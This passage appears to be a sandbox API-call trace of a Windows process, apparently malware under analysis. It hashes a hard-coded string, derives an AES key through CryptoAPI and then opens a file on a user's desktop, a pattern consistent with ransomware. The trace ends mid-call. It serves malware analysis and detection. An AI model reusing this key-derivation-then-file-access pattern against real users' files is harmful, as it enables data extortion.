CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2668 [0126.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2668 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0126.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0126.464] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca940 [0126.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca940, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.467] CryptHashData (hHash=0x41ac540, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0126.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0126.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0126.606] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0126.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0126.606] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0126.607] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0126.607] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca7d8 [0126.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.609] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0126.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0126.610] CryptDestroyHash (hHash=0x41ac540) returned 1 [0126.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\v_vfupg6jy sjdteia3.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0126.610] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.610] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0126.610] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0126.611] HeapFree (in: 